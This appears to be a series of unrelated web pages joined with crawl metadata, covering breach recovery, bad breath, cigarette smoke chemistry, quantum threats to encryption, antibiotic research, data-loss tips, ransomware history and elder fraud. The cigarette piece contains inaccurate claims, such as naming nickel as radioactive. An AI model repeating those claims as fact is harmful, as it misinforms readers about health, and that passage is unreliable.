business will determine which roles you need and which you are unable to fill; the three most important are legal, data forensics, and media management. Some team members may take on more than one role, or you may need to outsource for others. Having a second point of contact for each role will allow for any unexpected absences. How to recover following the event Say that, despite all your efforts to the contrary, a breach has occurred, and malicious actors gained unauthorised access to your personal information and private data. Fortunately, with your incident response plan in readiness and your response team well-prepped for the incident, you have minimised the damage as much as you can. The next phase is assessing the cause of the breach and taking steps to prevent it from happening again. This could mean anything from staff training to changing your antivirus software or implementing greater cybersecurity precautions. Further, if you have been liaising with the media, it’s important to allay the alarm of the public to soften the damage your reputation has taken. Social media updates and public announcements can go far in reclaiming your customer’s trust. Stay one step ahead with the right team The potential of data breaches is ominous. The steps and plans you should implement before, during, and after the incident can be overwhelming. Consult the IT specialists at INTELLIWORX for a risk assessment, and start building your data breach preventative plans today.
<urn:uuid:ff2e9597-fcb7-472e-8056-012adf7b41a0>
CC-MAIN-2022-40
https://intelliworx.co/au/blog/steps-to-successfully-manage-a-data-breach/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00333.warc.gz
en
0.931743
1,457
2.921875
3
What Causes Bad Breath? The causes of bad breath and how to eliminate it. Many people have a problem with bad breath (halitosis), but they have no idea what causes it or how to eliminate it. In general, there are three possible reasons why a person might have bad breath: 1. Eating Smelly Foods Aromatic foods such as onions, garlic, fish, peanut butter and others can leave a strong odor on your breath, but this type of bad breath is only temporary unless there are also other problems. 2. Poor Oral Hygiene Properly brushing, flossing and using mouthwash is essential for keeping bad breath at bay. Maintaining good oral hygiene is also very important for preventing the third (and most serious) cause of bad breath... 3. A Dental Condition Dental conditions such as gum disease, oral cancer, cavities, and/or bacteria on the surface of the tongue typically result in bad breath. Unfortunately, these conditions cannot be remedied without the help of a dentist. In a nutshell, brushing (including the tongue), flossing and gargling with mouthwash after every meal coupled with regular professional cleanings will prevent the most pervasive causes of bad breath. Chewing gum helps reduce the intensity of bad breath by keeping the mouth moist, and many people also find relief by using toothpaste, mouthwashes and other oral hygiene products that are formulated specifically to combat persistent halitosis.
<urn:uuid:0327640e-f352-4e6b-8ab4-9b79afe80b13>
CC-MAIN-2022-40
https://www.knowledgepublisher.com/article/258/what-causes-bad-breath.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00333.warc.gz
en
0.946664
302
2.828125
3
Chemical Components of Cigarette Smoke Chemical Components in a Cigarette If you are not aware of the components in a cigarette then see the picture below and any sensible person who is conscious about his/her health as well as the health of others will stop smoking cigarette from now onwards. Nicotine is a powerful insecticide and poisonous for the nervous systems. Furthermore, there is enough (50 mg) in four cigarettes to kill a man in just a few minutes if it were injected directly into the bloodstream. Indeed, fatalities have occurred with children after they had swallowed cigarettes or cigarette butts. When diluted in smoke, nicotine reaches the brain in just seven seconds, it stimulates the brain cells and then blocks the nervous impulse. This is where addiction to tobacco arises. Nicotine also causes accelerated heart rate, but at the same time it leads to contracting and hardening of the arteries: the heart pumps more but receives less blood. The result is twice as many coronary attacks. Nicotine thus also increases the consumption of lipids (which is why it has a weight-loss effect) and induces temporary hyperglycemia (hence the appetite suppressing effect). Carbon monoxide (CO) This is the asphyxiating gas produced by cars, which makes up 1.5% of exhaust fumes. But smokers inhaling cigarette smoke breathe in 3.2% carbon monoxide - and directly from the source. Oxygen is mostly transported in blood by haemoglobin. When we smoke, however, the carbon monoxide attaches itself to the haemoglobin 203 times more quickly than oxygen does, thereby displacing the oxygen; this in turn asphyxiates the organism. This causes the following cardiovascular complaints: narrowing of the arteries, blood clots, arteritis, gangrene, heart attack, etc. but also a loss of reflexes and visual and mental problems. It takes between six and 24 hours for the carbon monoxide to leave the blood system. These substances paralyse and then destroy the cilia of the bronchial tubes, responsible for filtering and cleaning the lungs. They slow down respiratory output and irritate the mucous membranes, causing coughs, infections and chronic bronchitis. As the cilia are blocked (see paragraph above), the tars in the cigarette smoke are deposited and collect on the walls of the respiratory tract and the lungs, and cause them to turn black. So, just because a smoker is not coughing, it doesn't mean that he or she is healthy! And this fact merely serves to pour water on one of the most common and poorest excuses given by smokers. The carcinogenic action of the tars is well known: they are responsible for 95% of lung cancers. It takes two days at least after cessation of smoking for the cilia to start functioning properly again, albeit only gradually. By smoking one packet of cigarettes every day, a smoker is pouring a cupful of these tars into his or her lungs every year (225 grams on average)! Chemistry of Tobacco Smoke No less than 4000 irritating, suffocating, dissolving, inflammable, toxic, poisonous, carcinogenic gases and substances and even radioactive compounds (nickel, polonium, plutonium, etc.) have been identified in tobacco smoke. Some of these are listed hereafter: Benzopyrene, dibenzopyrene, benzene, isoprene, toluene (hydrocarbons) ; naphthylamine; nickel, polonium, plutonium, arsenic, cadmium (metallic constituents) ; carbon dioxide, methane, ammonia, nitric oxide, nitrogen dioxide, hydrogen sulphide (gases); methyl alcohol, ethanol, glycerol or glycerine, glycol (alcohols and esters); acetaldehyde, acrolein, acetone (aldehydes and ketones); cyanhydric or prussic acid, carboxyl derivatives (acids); chrysene, pyrrolidine, nicotine, nicoteline, nornicotine, nitrosamines (alkaloids or bases), cresol (phenols) etc.
<urn:uuid:9281cd29-7a2b-4883-af91-69100eafe7ee>
CC-MAIN-2022-40
https://www.knowledgepublisher.com/article/393/chemical-components-of-cigarette-smoke.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00333.warc.gz
en
0.909854
851
3.296875
3
The rapid technological change that has occurred in the last decade has transformed every corner of our lives, from how we communicate with friends to the skills needed to navigate and prosper in the current labour market. As Professor Ian Chubb, neuroscientist and former Chief Scientist of Australia, summed it up in 2013: “STEM is everywhere. Our nourishment, our safety, our homes and neighbours, our relationships with family and friends, our health, our jobs, our leisure are all profoundly shaped by technological innovation and the discoveries of science.” The scale and pace of these changes poses challenges for those at all stages of the education and career ladder. For mid-career professionals moving into roles managing ambitious graduates with a higher technological literacy than their own, the challenges are perhaps greater than for any other cohort. In line with that, there is great opportunity for both tech education and management training. The base level of tech literacy is higher than ever Recent and future graduates are reaping the benefits of a growing emphasis on STEM (science, technology, engineering and mathematics) across all levels of education – from primary through to postgraduate. Their skills and perspectives are shaped by a curriculum and learning methodology revolving heavily around inquiry, problem-solving and digital know-how. Rather than being just elements of the overarching curriculum, STEM is now central to the foundational knowledge being taught in classrooms, from early years onwards. Graduates from all disciplines are entering the workforce with advanced STEM skills: they expect their leaders to be digitally fluent, globally oriented and knowledgeable about future directions in science and technological innovation. The managers who keep up-to-date with technological advancements – those unique to their industry, as well as business productivity tools more generally – bring the best out of their teams by playing to the team’s strengths. Talented teams need knowledgeable leadership A team of skilled technology professionals relies on informed management to make the most of their skills, and translate their work into a marketable and valuable service. So what should the modern manager do to become fluent with the technologies shaping the global marketplace and the skillsets of their teams? What can they do to ensure their team is engaged and supported to achieve their collective best? More than anything, they must make a conscious and proactive effort to keep up. It is not optional any more; managers have to be as technically literate as the teams they lead. A continued commitment to ongoing education – whether it’s formal postgraduate education, attendance at relevant conferences, or simply staying up-to-date with industry publications – enables mid-career professionals to progress at a managerial level when it comes to industry developments and opportunities. Waiting for new trends to become widespread leaves you behind the pack Today’s managers need to be one step ahead of digital trends, so they can make the most strategically discerning business and marketing decisions. There is no magic crystal ball, of course, but the best leaders out there have a mindset that is always future-focused. Considering the impact technology is having on industries unrelated to your own is a useful activity, looking out for the opportunities that could translate to your business. A leader that’s dedicated to supporting a talented team needn’t be expected to know the intricate technological details to bring a project to life, but they should understand and appreciate the capability of their team. Project and stakeholder management are key skills very much in demand in the IT sector. Many businesses are negotiating complex structural transformations to set themselves up for business growth in the new, digitally shaped environment. IT professionals need a well-rounded skillset On the flip side, it’s increasingly important for talented technologically minded professionals to develop managerial skills. Whether you’re preparing for career progression or pursuing entrepreneurial opportunities, having a strong set of soft skills to complement your tech talent is essential. More and more frequently, employers are looking for versatile people who can adapt according to each new project’s needs – and the person with a varied toolkit of skills is infinitely more appealing than someone who is an expert in only one stream. Using tech makes fitting education into your schedule easier Advancements in tech obviously don’t stop at business. There are numerous ways to introduce tech or tech management education into your schedule. Massive open online courses (MOOCs) are a great tool for brushing up on fundamentals – accessing courses from universities around the world for free, self-paced learning (without gaining a formal qualification). However, if you’re looking to advance your career, it’s undeniable that a postgraduate qualification can be the key to unlocking many opportunities. Undertaking a masters of IT online will provide formal technical and managerial education in a practical way, and can be completed in as little as two years part-time. Southern Cross University is an established Australian public university, with campuses at Lismore and Coffs Harbour in northern New South Wales, and at the southern end of the Gold Coast in Queensland. SCU offers on-campus and online postgraduate courses in project management, accounting, business, education, engineering, healthcare, IT and law.
<urn:uuid:a1ae8669-09c6-400c-a906-9383aaa5a225>
CC-MAIN-2022-40
https://bdtechtalks.com/2017/07/11/the-importance-of-ongoing-tech-education-as-a-manager/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00333.warc.gz
en
0.955157
1,052
2.5625
3
Quantum computers will open doors to otherwise impossible breakthroughs. At the same time, they might render our security defenses useless. Quantum computing is an existential threat, says Denis Mandich, CTO of Qrypt, a quantum-secure encryption provider. Fully aware that quantum computers could easily break the protections we rely on today, the US government is racing to build a post-quantum encryption standard to protect against that threat. In theory, we could have unbreakable cryptography resistant to quantum computer threats as early as the beginning of 2022. Yet, in practice, we’ve witnessed two post-quantum algorithms breached using conventional computers and sending shock waves to the cryptographer community. “The fear right now is that these new algorithms we are transitioning to will break, and there’s no proof that they are secure,” Mandich said. He believes that quantum computers are becoming the virtual nuclear weapons of cyber warfare, so it is crucial to start quantum encrypting your data today. I sat down with Mandich to discuss the less exciting side of quantum computing – the disruption that it brings. Baidu introduced its first quantum computer. IBM said it would build 4000 qubit-strong commercial quantum computers by 2025. All the opportunities and excitement aside, can you elaborate on the threat and risks that the dawning era of quantum computing poses to our everyday life? It's an existential threat to our digital lives and communications today. Believe it or not, we currently rely on just a handful of algorithms that run the entire internet, all banking transactions, and all our medical records. These were invented in the 1970s, and quantum computers break these systems. Unfortunately, they underpin all of the digital asset security we have today for software applications, web browsers, and just about everything else you can think of. Back in the early 2010s, the government realized this and began a process to phase these algorithms out and replace them with newer ones, and they are called post-quantum cryptography. These will theoretically be safe against quantum computers. But we don't know because there's no track record for them. Recently, one of the strongest ones that were held in reserve, called SIKE (Supersingular Isogeny Key Encapsulation), was broken by a regular computer. We have no proof that these new algorithms we are transitioning to are secure, the fear is that one of these will break. Since China, the US, and many other governments worldwide have been collecting data [store-now-decrypt-later], waiting for the day when they will be able to decrypt it and operationalize it. Everyone is very concerned that we might not be as safe as we thought we would be by converting to post-quantum crypto. Quantum is scaling much faster than we expected. Maybe it's for the better that we learned now that a post-quantum cryptographic algorithm could be cracked? On the other hand, it was designed to resist a quantum threat but was broken using a conventional computer in an hour, so this must concern you, right? It's shocking. It has shaken the entire cryptographic community because the way it was broken was based on techniques and math discovered in the 1970s. We started with over 80 of them [post-quantum encryption algorithms] and are down to a handful. The problem here is that SIKE, although less performant than the other algorithms, was considered at least as strong but was broken so quickly. What if that did happen and had not been discovered for five or ten years? What about other algorithms? They haven't been breached yet, but does that mean they are unhackable? Maybe it's just a matter of time and persistence. Even the government has told us to be crypto agile [crypto-agility is the ability of a security system to switch between algorithms rapidly], which means be prepared for them to fail. It could be tomorrow, it could be ten years from now, but the anticipation is that they will eventually break, and we will have to come up with stronger and stronger systems. What does it mean for companies? If I were a company's CEO, I would probably be lost at the moment, with some experts urging to prepare for the shift towards post-quantum cryptography and, simultaneously, witnessing some algorithms being broken with conventional computers. What should companies do now – should they look into different algorithms or wait for the standard to be implemented? Waiting would be a mistake because we know for sure, and it's publicly proven through Shor's algorithm and other means that the ones we are using today are broken. They are not secure. Although we are not 100% sure about the ones we are transitioning to, that's way better, way stronger, and being crypto agile is a better position for all future applications development. The older monolithic ones will be deprecated and will not be used in the future. So the first step is getting your crypto inventory and figuring out what's on your system. The standardization can be in as little as 15 months, January 2024. We are not that far out, so everyone should be trying proofs of concept and test implementations to see what kind of systems will break and what kind of software will have performance issues when we transition to post-quantum. Start doing all those things now because if you are in the compliance industry or if you are in the US government, you have to transition to post-quantum. It is not an option. This is mandatory. What if you are not the US government? What if you are just some private company sitting on intellectual property? You are not obliged to adopt those algorithms, and yet, at the same time, you could expose some data related to the US government, given everything is interconnected. The transition will be gradual, and small companies that are not required to comply with government standards will start doing that in probably six months or so. It makes no sense to engineer something into your system that's quantum insecure. Virtually everyone going forward, certainly after 2024, will say they are post-quantum safe or something to that effect. In the same way you see a little lock for HTTPS on your browser, you will see HTTPQ, and if you will not, you will not click on those browsers because you will assume that your data is not safe. This is just a matter of time. There's a significant cost for anyone who does not transition. If you are developing new software, a roadmap for something for five years, you don't want to go back and re-engineer those systems to be post-quantum secure later. You want to build in that now and figure out what will work when you scale, especially if you plan to be successful as a company. In terms of implementing any of these solutions, is it challenging to do it? Can I choose one protocol now and then move to something else, maybe safer, a few years from now? Yes. If you build in that crypto agility from the beginning, you should be able to swap that in and out. If you didn't, you made a huge mistake. This is part of a standard that NIST (National Institute of Standards and Technology) guidance gave. You have to be crypto agile because we, NIST, don't know, we have no idea if these can break at any time. SIKE was a huge warning and a reminder for people that you have to be crypto agile. What's your opinion on the store-now-decrypt-later trend? Are threat actors extracting vast amounts of data and waiting for quantum computers to arrive and decipher it for them? Is that a significant threat? Will we see a massive leakage of secrets once quantum computers come? They are storing way more than people can believe. The cost of storing data is almost zero at this point. It costs nothing to store the data, and you are not running massive systems that need to be continuously accessed with computational resources. The profit margin for storing data is exceptionally high, and the cost is extremely low. You don't have to decrypt all that data. You have to be able to decrypt a few pieces of it. The US government did this for decades, for the entire Cold War, it was called the Venona project, and it was highly successful. This was one of the best techniques where you don't have physical access to someone's systems, but you have access to the signals coming out of a facility, over the internet, over the satellites. Collecting those is very easy, as we do everything over the internet, those pipes go through data centers worldwide, through different vendors, where they can be captured and stored. The Chinese government's number one goal is to overtake the US economy, and they've been very successful at that. We've seen the largest transfer of wealth from one country to another, from the United States to China, through the [theft] of intellectual property. That is not going to change. That is how their system works. The US government can only collect secrets, not help any company get richer, but they can do that in China. They can collect secrets from US entities to make Huawei a bigger company. You can't do that in the United States, you can only steal secrets for strategic decisions of the government, not to enrich IBM. More from Cybernews: Subscribe to our newsletter
<urn:uuid:e6d22c73-9e05-491e-ba8a-ea80dc80de24>
CC-MAIN-2022-40
https://cybernews.com/editorial/the-existential-threat-of-quantum-computing-interview/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00333.warc.gz
en
0.966934
1,922
2.734375
3
Bacterial infections are the number one cause of death in hospital patients in the United States, and antibiotic-resistant bacteria are on the rise, causing tens of thousands of deaths every year. Understanding exactly how antibiotics work (or don’t work) is crucial for developing alternative treatment strategies, not only to target new “superbugs,” but also to make existing drugs more effective against their targets. Using synthetic biology techniques, a team of researchers at the Wyss Institute at Harvard University has discovered that bacteria respond to antibiotics very differently – exactly the opposite, in fact – inside the body versus on a Petri dish, suggesting that some of our current assumptions about antibiotics may be incorrect. “The image most clinicians have is that antibiotics work by killing actively dividing bacteria, and non-dividing bacteria are the ones that resist treatment and cause infections to persist. I wanted to know whether that’s actually true – does the proportion of dividing bacteria change over the course of an infection, and how do antibiotics impact that?” says Laura Certain, M.D., Ph.D., a Clinical Fellow at the Wyss Institute and the Massachusetts General Hospital who is the first author of the study. “Synthetic biology is widely used to engineer bacteria so that they produce useful products or diagnose diseases, and we used that same approach to create a microbiology tool that can tell us how bacteria are behaving in the body.” The research is published in today’s issue of Cell Host & Microbe. Certain and her colleagues used a genetically engineered strain of E. colibacteria that was created in the lab of Wyss founding Core Faculty member Pamela Silver, Ph.D. a few years ago. The bacteria have a genetic “toggle switch” encoded into their DNA that changes from the “off” to the “on” position when the bacteria are exposed to a chemical called anhydrotetracycline (ATC). When the switch is turned on, a genetic change happens in the bacteria that allows them to digest the sugar lactose, while bacteria whose switches remain off cannot. The key to this system is that the toggle switch can only be flipped if the bacteria are actively dividing when ATC is added; any non-dividing bacteria’s switches will stay off, even when ATC is present. Thus, the toggle switch offers a snapshot in time that can indicate whether bacteria were active or dormant at the moment of ATC exposure. Bacterial studies are often carried out in vitro, but infections happen in the complex environment of living bodies, which are quite different from a petri dish. To evaluate their bacteria in vivo, the researchers implanted a small plastic rod into the legs of mice and inoculated their engineered bacterial strain into the leg to imitate the chronic bacterial infections that commonly arise in humans when medical devices and artificial joints are implanted. They then injected the mice with ATC at different times throughout the course of the infection to flip the toggle switch in any dividing bacterial cells to the “on” position. When they extracted bacteria from the mice and grew them on a special lactose-containing medium, they found that all the bacteria were actively dividing for the first 24 hours, but by the fourth day that fraction dropped to about half and remained constant for the rest of the infection, indicating that the number of bacteria being killed by the body was balanced by new bacteria being created via cell division. This result differed from the in vitro response, in which all the bacteria stopped dividing once they reached the carrying capacity of their environment. Next, the scientists tested the bacteria’s response to antibiotics in vivo by allowing the infection to progress for two weeks, then injecting the mice with the antibiotic levofloxacin. When they analyzed the extracted bacteria, they found that while the total amount of bacteria in the mice decreased, the proportion of the surviving bacteria that were actively dividing actually increased. This outcome was in direct opposition to antibiotics observed in vitro, which killed more dividing cells than non-dividing cells. The researchers screened the bacterial colonies for antibiotic resistance, and did not find any evidence that the bacteria had evolved to better withstand the killing effects of the levofloxacin, confirming that the antibiotic was still effective. “There are several possible reasons why we saw a higher proportion of dividing bacteria in the presence of an antibiotic,” says Certain. “We find it most likely that dormant cells are switching into an active state in order to ‘fill the gaps’ that arise when antibiotics reduce the overall bacterial population. If bacteria continue to actively divide throughout an infection, as our study suggests, they should be susceptible to antibiotics.” Indeed, the researchers were able to cure the infection with a higher dose of the antibiotic, indicating that, contrary to conventional assumptions about bacterial infections, there is no fixed population of dormant, antibiotic-tolerant cells in this chronic infection model. “If an antibiotic isn’t working, we should focus on finding ways to deliver more of it to the infection site or identifying other tolerance mechanisms that might be at play, rather than assuming that a bastion of non-dividing bacteria is the culprit,” says corresponding author and Wyss founding Core Faculty member Jim Collins, Ph.D., who is also the Termeer Professor of Medical Engineering & Science and a Professor of Biological Engineering at the Massachusetts Institute of Technology. “This research shows the power of synthetic biology to provide new insights into mechanisms of cellular control, and emphasizes how we have to continually question the assumptions that guide clinical care today,” says Wyss Institute Founding Director Donald Ingber, M.D., Ph.D., who also is the Judah Folkman Professor of Vascular Biology at Harvard Medical School and the Vascular Biology Program at Boston Children’s Hospital, as well as Professor of Bioengineering at Harvard’s John A. Paulson School of Engineering and Applied Sciences. Additional authors of the paper include Jeffrey Way, Ph.D., Senior Staff Scientist at the Wyss Institute, and Matthew Pezone, a Research Assistant at the Wyss Institute. This study was supported by the Paul G. Allen Frontiers Group, the Defense Threat Reduction Agency, and the Wyss Institute at Harvard University.
<urn:uuid:6d285d36-09b8-41c5-8348-8a8e0d20ae20>
CC-MAIN-2022-40
https://debuglies.com/2017/09/06/bacteria-with-synthetic-genetic-switches-show-that-antibiotics-work-differently/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00333.warc.gz
en
0.939199
1,309
3.828125
4
Making it hard for hackers involves longer and stronger passwords. It also means keeping your files and systems up to date. Losing your data from your computer is a sheer nightmare as it often means losing things that are dear to us. Do yourself a favor and take a little advice from this article on how to help prevent data loss. 1) This may involve buying an upgrade every now and again, but that is not all you can do. For example, when Windows downloads updates then run them. Don’t leave them kicking around for six months 2) You need this for more reasons that you know. The Internet is full of auto-download stuff and clickable attack stuff. Antivirus software will protect you from everything (malware, worms, etc). You also need a security program that pre-empts the virus downloading or setting up shop on your computer. 3) It all seems like wasted computer space, all up until the point where you actually need it, then it is a godsend. It could just be that you forgot to install a program that simply will not un-install correctly. Use the system restore to get you back to the point before you downloaded or installed the program. Backup your files 4) This is a no brainer. For example, if you keep your college files on your hard drive, then back them up as hard copies on discs. If you have lots of accountancy documentation then make hard copies, or store the backup information on a removable hard drive. 5) The easiest way to prevent power surges: Do not plug your computer into the wall socket. Plug the socket power strip into the wall and then plug your computer, printer, monitor, etc, into the strip. Protect your computer from physical harm 6) This means protecting it from extended periods in the sun, from excessive moisture, from dust, dirt, knocks or scrapes. Create strong passwords 7) Keep hand-written notes of your passwords but do not store them on anything electronic. De-frag Your Computer 8) Computers are advanced enough you won’t have to defragment every week like we used to. Many computers still function quite well when they are fragmented, but that does not mean you should not maintain your computer. Consider human threats from within 9) You may lose data thanks to your kids playing with your laptop. You may lose data from one of your malcontent staff removing information via a flash drive. You may also have a sneaky and suspicious partner who monitors and purges your files of things that he/she does not approve of. Do not overlook your internal threats. Make it hard for hackers and be wary with emails 10) Making it hard for hackers involves longer and stronger passwords. It also means keeping your files and systems up to date. Keep yourself informed on the current hacker trends. This is especially true of email matters. Some phishing or malware emails look very inviting and legitimate. Be suspicious at all times and always make backup plans in case your next email contains the virus to end all viruses. Author bio: Korah Morrison, writer on college-paper.org that helps students achieve their academic goals.
<urn:uuid:474e80d9-200a-4ad3-9f45-849094da7dae>
CC-MAIN-2022-40
https://www.colocationamerica.com/blog/top-10-tips-to-prevent-data-loss
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00533.warc.gz
en
0.930767
668
2.65625
3
When a cyber-criminal wants to make a quick bundle of cash, they use Ransomware to infect a computer and encrypt all of the data on the hard drive. The malicious software sends an alert to the user indicating they must pay a ransom or lose their files forever. In the past, criminals demanded ransoms be sent via cash or money order to post office boxes. However, that didn’t always last because post office boxes are traceable to an individual. Today, the ransom is almost always requested in the untraceable, anonymous currency of Bitcoin. Now that ransoms can be paid in an untraceable manner, the frequency of ransomware attacks has exploded. The first documented Ransomware attack was perpetrated in December 1989 by an evolutionary biologist named Joseph L. Popp. Back in 1989, the internet existed but it wasn’t what it is today, so the attack was executed through an infected computer disk. Popp sent out 20,000 infected disks to attendees of the international AIDS conference. The disks were labeled “AIDS Information – Introductory Diskettes.” Under the guise of being a questionnaire to help users determine their risk of contracting AIDS, the disks were secretly infected with ransomware dubbed the “AIDS Trojan” also known as the “PC Cyborg.” After 90 reboots, unsuspecting victims were met with a ransom demand for $189. Popp wanted payments to be sent to his post office box in Panama, which was eventually traced. Surprisingly, he was caught but never prosecuted. Since then, thousands of Ransomware attacks have been perpetrated against individuals, small businesses, and even giant corporations. Although Ransomware attacks started out rather basic, they’ve become complex and virtually untraceable. Unfortunately, because of the profitability, Ransomware attacks are here to stay. Although most people understand the concept of ransomware, it should be called out for what it really is – extortion. Extortion is a felony in the United States and that’s why modern day criminals are brave enough to launch ransomware attacks while relying on the anonymity of cryptocurrencies. Ransomware attacks rely on encryption technology to prevent access to files. Throughout the 1990s, as encryption methods continued to advance, Ransomware attacks also became more sophisticated and impossible to crack. Around 2006, groups of cyber criminals began taking advantage of asymmetric RSA encryption to make their attacks even more impossible to thwart. For example, the Archiveus Trojan used RSA encryption to encrypt the contents in a user’s “My Documents” folder. The ransom demanded victims purchase goods through an online pharmacy in exchange for a 30-digit password that would unlock the files. Another Ransomware attack around that time was the GPcode attack. GPcode was a Trojan distributed as an email attachment masquerading as a job application. This attack used a 660-bit RSA key for encryption. Several years later Gpcode.AK – it’s predecessor – leveled up to using 1024-bit RSA encryption. This variant targeted more than 35 file extensions. Ransomware attacks may have started off simplistic and daring, but today they’ve become a business’ worst nightmare and a criminal’s cash cow. Cyber criminals know they can make money with Ransomware and it’s become a largely profitable industry. According to a Google study titled Tracking Ransomware End-to-End, cyber criminals make over $1 million per month with Ransomware. “It’s become a very, very profitable market and is here to stay,” said one researcher. The study tracked more than $16 million that appeared to be ransom payments made by 19,750 people in the span of two years. The BBC reported on this Google study and explained that there are multiple ‘strains’ of Ransomware and some strains make more money than others. For example, a Bitcoin blockchain analysis showed that the two most popular strains – Locky and Cerber – made $14.7 million combined in just one year. According to the study, more than 95% of Ransomware attackers cashed out their Bitcoin payments through Russia’s now defunct BTC-e exchange. They’ll probably never be caught. Business owners who are unprepared for a Ransomware attack won’t bounce back without consequence – if they bounce back at all. They’ll either pay the ransom (which doesn’t always result in the restoration of files) or they’ll spend time and money unsuccessfully trying to crack the encryption. When nothing works, they’ll source a former version of their files from employees, contractors, and others who may have copies. While they might find most of their files, they won’t be current versions and the entire team will need to put in extra hours just to get the business back to normal. The only way to prevent a Ransomware attack is to be prepared before it happens. That requires creating regular offline backups on a device that doesn’t stay connected to the internet. Malware, including Ransomware, can infect backup drives and USB drives just the same. It’s crucial to ensure you maintain current offline backups. If you haven’t yet, now is the time to secure all endpoints with anti-ransomware software. At Check Point Software, we offer this solution to all of our endpoint security suite customers. Our endpoint security suite – Harmony endpoint – delivers real-time threat prevention to all of your organization’s endpoints. With so many devices accessing your company’s network, you can’t afford to skip endpoint protection and threat prevention. Today’s borderless networks require powerful software to protect against cyber-attacks of all kinds including ransomware. With Harmony Endpoint, your network will be dynamically protected around the clock from ransomware and other threats. To learn more about how Check Point can protect your network, schedule a free demo for Harmony endpoint or contact us for more information. If you’re not sure which services you need, our data protection experts will help you find what’s right for you.
<urn:uuid:42b5129b-970a-4169-8ba5-b83c1fb4b330>
CC-MAIN-2022-40
https://www.checkpoint.com/cyber-hub/threat-prevention/ransomware/evolution-of-ransomware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00533.warc.gz
en
0.943185
1,277
3.234375
3
According to the FBI, each year millions of elderly Americans fall victim to some type of financial fraud. Savvy criminals may use deception and misinformation to trick older victims, including impersonating a trusted individual or organization, using a fake number on caller ID, pressuring the victim to make a quick decision, or even threatening them. Learn about these common scams that target seniors as well as ways to help you or your loved ones better detect and avoid them. What Is Elderly Financial Fraud? Older adult financial fraud occurs when someone misuses or steals financial assets, income, or personal identifying information from an older adult, often without their knowledge or consent. Seniors may be targeted by criminals because of their financial savings and solid credit, or simply tendency of many older people to be trusting and polite. Scammers may contact their victims directly via computer, phone, mail, or indirectly through TV and radio offers. According to the Internet Crime Complaint Center (IC3), perpetrators use a variety of methods to deceive and defraud senior victims, including: - Impersonation scams - Scammers may pose as government employees or other officials claiming that the victim owes money for a fee or penalty. IRS impersonators may contact victims by phone and use aggressive tactics such as threatening the victim with arrest, suspension of a driver’s license, or deportation. Social Security Administration imposters may tell victims that their Social Security number has been suspended because of suspicious activity or a crime and ask to confirm the number in order to steal the information. - Robocall scams - Con artists may use robocalls to distribute prerecorded phone messages that appear to come from a bank, credit card company, creditor, or government agency. The goal is often to trick victims into revealing their account numbers, Social Security numbers, passwords, or other identifying information. These scammers may spoof caller ID to impersonate a legitimate organization or to appear as if they are calling from the victim’s home state or local area code. - Romance scams - Some criminals pose as a romantic interest on dating websites or social media in order to take advantage of an elderly victim’s desire to find companionship. Scammers have been known to create elaborate profile pages, communicate with the victim over the course of weeks or even months to build trust, or express a desire to marry the victim. These criminals often ask the victim for money to pay for travel expenses, a so-called medical emergency, visas or other official documents, or losses from a temporary financial setback. - Grandparent scams - During a grandparent scam, perpetrators may contact the victim pretending to be a relative—often a child or grandchild—in urgent financial need. Scammers may tell the victim that their grandchild needs money to help with an emergency, such as getting out of jail, paying a hospital bill, or leaving a foreign country. - Tech support scams - Scammers may contact the victim and impersonate a tech support representative, often using scare tactics to trick an older adult into paying for unnecessary services to fix a bogus problem. Fraudsters may claim to be a technician from a well-known company, or they may use pop-up messages to warn about fake computer problems. - Home improvement scams - Home improvement scammers may approach victims door-to-door, claiming they were in the neighborhood and noticed that the house needs repairs. They often ask for payment up front, and later disappear with the money, do low quality work, or claim to have discovered other problems in the house that need immediate attention at a significant cost. - Sweepstakes, charity or lottery scams - Criminals may claim to work for a charitable organization or say their victim has won a foreign lottery or sweepstakes, which can be collected after paying a fee. Warning Signs of Elderly Financial Fraud According to the FBI, seniors may be less inclined to report fraud because they don’t know how to report it, they are ashamed of being a scam victim, or they fear their relatives will lose confidence in their abilities. According to the US Department of Justice, warning signs of financial exploitation of an elderly person may include: - Changes in bank accounts or banking practices, including unexplained withdrawals - Unexpected changes in a will or other financial document - Unexplained disappearance of funds or other possessions - Unpaid bills or substandard care, despite the availability of adequate financial resources - Potentially forged signatures on financial transactions or titles - Sudden appearance of a previously uninvolved family member claiming property or possessions - Unexplained sudden transfer of assets to another person - The purchase of unnecessary services The impact of elderly financial fraud to its victims can be severe, including the loss of financial security, feelings of fear, shame, or self-doubt, reliance on government assistance programs, or even depression or hopelessness. Steps for Older Adults to Help Better Protect Themselves from Financial Fraud - Be cautious in sharing personal or financial information - The FBI advises individuals to never provide personal or financial information over the phone to an unverified person or organization. Instead, it is advised to hang up and call the phone number listed on the company’s account statement or the company or government agency’s official website. The IC3 advises never to give or send any personally identifiable information, money, jewelry, gift cards, checks, bank wire information, or funds to unknown or unverified persons or businesses. - Beware of unsolicited calls, messages, mail, or home visits - Experts advise that individuals screen unknown callers using voicemail. It is also recommended not to open any unrecognized emails, attachments, or websites, and to be cautious of any unsolicited mail and door-to-door service offers. - Consult a trusted family member or friend - The US Senate Special Committee on Aging recommends that seniors consider checking with a family member or trusted friend before giving out money or personal or financial information. If a panicked relative calls to request money, the Federal Trade Commission (FTC) advises calling the individual directly via a phone number that is known to be genuine or verifying the story with another family member or friend, even if the caller wants to keep it a secret. - Seek out verified professional services - To contract technical support services, it’s advised to find official contact details, such as information listed on the device’s original packaging or receipt. Many software companies offer tech support online or by phone, and computer stores often provide in-person support. When services are needed for home repairs or improvements, the Better Business Bureau recommends asking the contractor for references, searching for the company on the bbb.org website, and getting a written contract with the price, materials, and timeline. It’s best to avoid 